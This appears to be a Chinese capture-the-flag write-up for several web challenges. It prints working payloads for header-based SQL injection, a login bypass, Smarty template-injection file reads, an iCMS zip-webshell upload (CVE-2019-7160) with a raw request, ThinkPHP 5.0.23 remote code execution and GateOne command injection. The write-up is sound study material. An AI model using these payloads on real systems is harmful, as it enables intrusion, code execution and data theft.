Sql1.0[简单]
user-agent头注入、报错注入
payload: User-Agent: ','1',updatexml(1,concat(0x7e,(select * from secert),0x7e),1))#
Dashboard[困难]
登录框测试了一下 过滤了< ,> ,= ,^ , rexexp 等常用sql注入语句。所以猜测是万能密码之类的
用userName=12&passWord=||1#
登录成功
Y1ng%%%%
本来以为
这地方注入的。没测出来。发现了修改个人信息
测试后发现是smart模板。而smart支持{if xxx}{/if}语法
过滤了readfile、highlight、file_get_contents()、system、eval没过滤show_source
猜测是无参数rce
构造发现使用:
{if print_r(scandir(current(localeconv())))}{/if}可以读到当前目录文件
使用var_dump(scandir(dirname(chdir(dirname(dirname(dirname(getcwd())))))))}{/if}
可以读到根目录
但是flag在数组第七个位置,构造了半天没返回,
{if show_source(current(array_slice(scandir(dirname(chdir(dirname(dirname(dirname(getcwd())))))),7)))}{/if}
这样就行
尝试使用getallheadlers
测试发现虽然没有system执行任意命令,但还是可以通过构造读文件函数读到flag
{if show_source(end(getallheaders()))}{/if}
icms[简单]
找到后台界面:admincp.php
弱密码admin/admin123登录后台
在github可以发现文件遍历的issues
https://github.com/idreamsoft/iCMS/issues/54
可以看到根目录的flag文件
找到CVE-2019-7160
https://xz.aliyun.com/t/4030#toc-1
按照其步骤复现
将附件设置为/目录
找一个上传文件目录抓包修改
POST /admincp.php?app=files&do=IO&frame=iPHP&ext=zip&udir=&name=iCMS.APP.1-v1.1.1&watermark=false&CSRF_TOKEN=1401a5a70d407bf579b488d9e0939ceb84a9ce84 HTTP/1.1
Host: das.wetolink.com:48885
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: gateone_user="2|1:0|10:1594050688|12:gateone_user|108:eyJ1cG4iOiAiQU5PTllNT1VTIiwgInNlc3Npb24iOiAiTWpnNE9XVTFObVEwT1dJMU5HWmhNamxsWlRJMk9HUmlaak16TTJVeE0yRXlZIn0=|5f2f4537826218e819f771febdabc01d172ccd3d1d817223873deecbf4089abd"; __utma=229657609.1315421077.1594050728.1594050728.1594050728.1; __utmz=229657609.1594050728.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); iCMS_article_category_tabs=tree; iCMS_ACP_sidebar_mini=0; session=14aa621e-dbc6-4412-83ff-a3712922d49c.DfUSj_-cdrNBUe9PNiPpKnWpCGs; iCMS_apps_tab=apps-type-1; iCMS_iCMS_AUTH=99433c0cnzbDwSBRKsOqWQV0LT32_A3GhblsYcFtK3Tr-FYq0SCiBZmTczLk14AGCYoMbBcl2VsgAFTisVVfyvt2Ag5IjZT6RIkqlDoyaLfZ47UrxaPdtqw7
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 198
在下面用burp导入自己的zip马
上传成功
安装时虽然会报错,但是不影响使用
访问ip/app/你的shell即可
NiuShop[简单]
thinkphp5.0.23一把梭
get: ?s=captcha
post: _method=__construct&filter[]=system&method=get&get[]=whoami
GateOne[中等]
赵总的0day,%%%
https://github.com/liftoff/GateOne/issues/736
输入我们的vps连接,等待输入密码的时候,在console输入
GateOne.ws.send('{"terminal:ssh_get_host_fingerprint":{"host":"127.0.0.1","port":"80 ;ls /;"}}')